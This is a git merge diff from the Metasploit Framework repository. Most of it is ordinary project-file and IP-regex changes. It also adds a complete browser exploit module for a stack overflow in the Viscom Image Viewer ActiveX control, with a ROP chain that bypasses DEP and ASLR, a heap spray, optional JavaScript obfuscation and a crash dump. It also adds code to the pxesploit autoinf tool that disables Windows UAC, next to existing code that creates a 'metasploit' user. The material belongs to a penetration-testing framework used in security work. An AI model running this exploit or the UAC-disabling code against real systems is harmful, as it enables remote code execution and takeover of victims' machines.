Merge branch 'master' of github.com:rapid7/metasploit-framework

.gitignore

@@ -1,3 +1,4 @@
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
-
+tags
+*.swp

external/source/pxesploit/autoinf/autoinf.sln

@@ -1,18 +1,15 @@
 
-Microsoft Visual Studio Solution File, Format Version 11.00
-# Visual Studio 2010
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "autoinf", "autoinf\autoinf.vcxproj", "{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}"
+Microsoft Visual Studio Solution File, Format Version 10.00
+# Visual Studio 2008
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "autoinf", "autoinf\autoinf.vcproj", "{971845E1-6ACD-4470-B95E-391486749B67}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
 		Release|Win32 = Release|Win32
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}.Debug|Win32.ActiveCfg = Debug|Win32
-		{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}.Debug|Win32.Build.0 = Debug|Win32
-		{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}.Release|Win32.ActiveCfg = Release|Win32
-		{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}.Release|Win32.Build.0 = Release|Win32
+		{971845E1-6ACD-4470-B95E-391486749B67}.Release|Win32.ActiveCfg = Release|Win32
+		{971845E1-6ACD-4470-B95E-391486749B67}.Release|Win32.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

external/source/pxesploit/autoinf/autoinf/autoinf.vcproj

@@ -0,0 +1,125 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="autoinf"
+	ProjectGUID="{971845E1-6ACD-4470-B95E-391486749B67}"
+	RootNamespace="autoinf"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
+				ExceptionHandling="0"
+				RuntimeLibrary="2"
+				BufferSecurityCheck="false"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateManifest="false"
+				GenerateDebugInformation="false"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				EntryPointSymbol="start"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\main.cpp"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

external/source/pxesploit/autoinf/autoinf/autoinf.vcxproj

@@ -1,85 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{59D1A47A-5B05-4CBD-8F10-8C2498093BAE}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>autoinf</RootNamespace>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <GenerateManifest>false</GenerateManifest>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>Disabled</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <BufferSecurityCheck>false</BufferSecurityCheck>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <EntryPointSymbol>start</EntryPointSymbol>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="main.cpp" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>

external/source/pxesploit/autoinf/autoinf/autoinf.vcxproj.filters

@@ -1,22 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="main.cpp">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>

external/source/pxesploit/autoinf/autoinf/main.cpp

@@ -22,6 +22,14 @@ void start(){
 	RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD));
 	RegCloseKey(mkey);
 
+	//Disable UAC
+	HKEY uackey;
+	DWORD zero = 0;
+	RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
+		0,KEY_SET_VALUE|KEY_WOW64_64KEY,&uackey);
+	RegSetValueExA(uackey,"EnableLUA",0,REG_DWORD,(PBYTE)&zero,sizeof(DWORD));
+	RegCloseKey(uackey);
+
 	//add user
 	USER_INFO_1 userinfo;
 	userinfo.usri1_name = L"metasploit";

lib/rex/socket.rb

@@ -73,6 +73,17 @@ module Socket
 	def self.create_ip(opts = {})
 		return create_param(Rex::Socket::Parameters.from_hash(opts.merge('Proto' => 'ip')))
 	end
+	
+	
+	#
+	# Common Regular Expressions
+	#
+	
+	MATCH_IPV6 = /^\s*((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))(%.+)?\s*$/
+
+	MATCH_IPV4 = /^\s*(?:(?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))\s*$/
+	
+	MATCH_IPV4_PRIVATE = /^\s*(?:10\.|192\.168|172.(?:1[6-9]|2[0-9]|3[01])\.|169\.254)/
 
 	##
 	#
@@ -108,6 +119,8 @@ module Socket
 	# Determine whether this is an IPv4 address
 	#
 	def self.is_ipv4?(addr)
+		return false if addr =~ MATCH_IPV6
+		return true if addr =~ MATCH_IPV4
 		res = Rex::Socket.getaddress(addr)
 		res.match(/:/) ? false : true
 	end
@@ -116,19 +129,23 @@ module Socket
 	# Determine whether this is an IPv6 address
 	#
 	def self.is_ipv6?(addr)
+		return true if addr =~ MATCH_IPV6
+		return false if addr =~ MATCH_IPV4
 		res = Rex::Socket.getaddress(addr)
 		res.match(/:/) ? true : false
 	end
 
 	#
-	# Checks to see if the supplied address is a dotted quad.
+	# Checks to see if the supplied address is in "dotted" form 
 	#
 	def self.dotted_ip?(addr)
-		# Assume anything with a colon is IPv6
-		return true if (support_ipv6? and addr =~ /:/)
-
-		# Otherwise assume this is IPv4
-		(addr =~ /^(?:(?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2})[.](?:25[0-5]|2[0-4][0-9]|[0-1]?[0-9]{1,2}))$/) ? true : false
+		# Match IPv6
+		return true if (support_ipv6? and addr =~ MATCH_IPV6)
+	
+		# Match IPv4
+		return true if (addr =~ MATCH_IPV4)
+		
+		false
 	end
 
 	#
@@ -137,7 +154,7 @@ module Socket
 	#
 	def self.is_internal?(addr)
 		if self.dotted_ip?(addr)
-			addr =~ /^(?:10\.|192\.168|172.(?:1[6-9]|2[0-9]|3[01])\.|169\.254)/
+			addr =~ MATCH_IPV4_PRIVATE
 		else
 			false
 		end

modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb

@@ -0,0 +1,204 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
+			'Description'    => %q{
+					This module exploits a stack based buffer overflow in the Active control file
+				ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
+				method. Exploitation results in code execution with the privileges of the user who
+				browsed to the exploit page.
+
+				The victim will first be required to trust the publisher Viscom Software.
+				This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
+				with Java support.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Dr_IDE', # Vulnerability discovery and original exploit
+					'TecR0c', # Metasploit module
+					'mr_me'   # Metasploit module
+				],
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.exploit-db.com/exploits/15668/' ],
+					[ 'URL', 'http://secunia.com/advisories/42445/' ],
+					[ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'DisablePayloadHandler' => 'false',
+					'InitialAutoRunScript' => 'migrate -f'
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[ 'Windows XP IE6-7', {} ],
+					[ 'Windows XP IE8, Windows Vista & Windows 7 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
+				],
+			'DisclosureDate' => 'Mar 03 2010',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
+	end
+
+	# Prevent module from being executed in autopwn
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def junk(n=4)
+		return rand_text_alpha(n).unpack("L")[0].to_i
+	end
+
+	def on_request_uri(cli, request)
+
+		# Set target manually or automatically
+		my_target = target
+		if my_target.name == 'Automatic'
+			agent = request.headers['User-Agent']
+			if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
+				my_target = targets[1] # XP
+			elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
+				my_target = targets[1] # XP
+			elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
+				my_target = targets[2] # XP
+			elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
+				my_target = targets[2] # Vista
+			elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
+				my_target = targets[2] # Vista
+			elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
+				my_target = targets[2] # Win7
+			end
+		end
+
+		sploit = rand_text_alpha(52)
+		pivot = [0x12AE0FE4].pack("V") # Address to my code
+
+		if my_target.name =~ /IE8/
+
+			code =
+			[ # MSVCR71.dll - rop chain generated with mona.py
+				0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
+				0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
+				0x7C347F98, # RETN (ROP NOP)
+				0x7C3415A2, # JMP [EAX]
+				0xFFFFFFFF, #
+				0x7C376402, # Skip 4 bytes
+				0x7C351E05, # NEG EAX # RETN
+				0x7C345255, # INC EBX # FPATAN # RETN
+				0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
+				0x7C344F87, # POP EDX # RETN
+				0xFFFFFFC0, # Value to negate, will become 0x00000040
+				0x7C351EB1, # NEG EDX # RETN
+				0x7C34D201, # POP ECX # RETN
+				0x7C38B001, # &Writable location
+				0x7C347F97, # POP EAX # RETN
+				0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
+				0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
+				0x7C345C30, # Ptr to 'push esp # ret
+			].pack("V*")
+
+			code << payload.encoded
+			sploit << [0x100EAD78].pack("V") # POP ESP # RETN [IMAGEV~1.OCX]
+
+		else
+			code = payload.encoded
+			sploit << pivot
+		end
+
+		# Payload in JS format
+		code = Rex::Text.to_unescape(code)
+
+		sploit << [0x41414141].pack("V") # Filler
+		sploit << [0x42424242].pack("V") # Filler
+		sploit << [0x43434343].pack("V") # Filler
+		sploit << pivot
+
+		# Randomize the javascript variable names
+		vname = rand_text_alpha(rand(100) + 1)
+
+		spray = <<-JS
+		var heap_lib = new heapLib.ie(0x20000);
+		var code = unescape("#{code}");
+		var nops = unescape("%u0c0c%u0c0c");
+
+		while (nops.length < 0x2000) nops += nops;
+		var offset = nops.substring(0, 0x800-0x20);
+		var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
+
+		while (shellcode.length < 0x40000) shellcode += shellcode;
+		var block = shellcode.substring(0, (0x7fb00-6)/2);
+
+		heap_lib.gc();
+
+		for (var i = 0; i < 0x200; i++) {
+		heap_lib.alloc(block);
+		}
+
+		var overflow = unescape("#{sploit}");
+		var variable1 = "VARIABLE";
+
+		#{vname}.TIFMergeMultiFiles(variable1,variable1,overflow);
+		JS
+
+		# Use heaplib
+		js = heaplib(spray)
+
+		# Obfuscate on demand
+		if datastore['OBFUSCATE']
+			js = ::Rex::Exploitation::JSObfu.new(js)
+			js.obfuscate
+		end
+
+		html = "<html>"
+		html << "\n<object classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E' id='#{vname}'></object>"
+		html << "\n\t<script>#{js}\n\t</script>\n</html>"
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, html)
+
+	end
+
+end
+=begin
+(460.1d4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=0000fffd ebx=00000000 ecx=41414141 edx=6c440088 esi=00000010 edi=0204f5a8
+eip=42424242 esp=0204f5b8 ebp=0204f644 iopl=0         nv up ei pl nz ac po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
+41414141 ??              ???
+
+0:005> dd @esp
+0203f594  41414141 41414141 41414141 41414141
+0203f5a4  41414141 41414141 41414141 41414141
+=end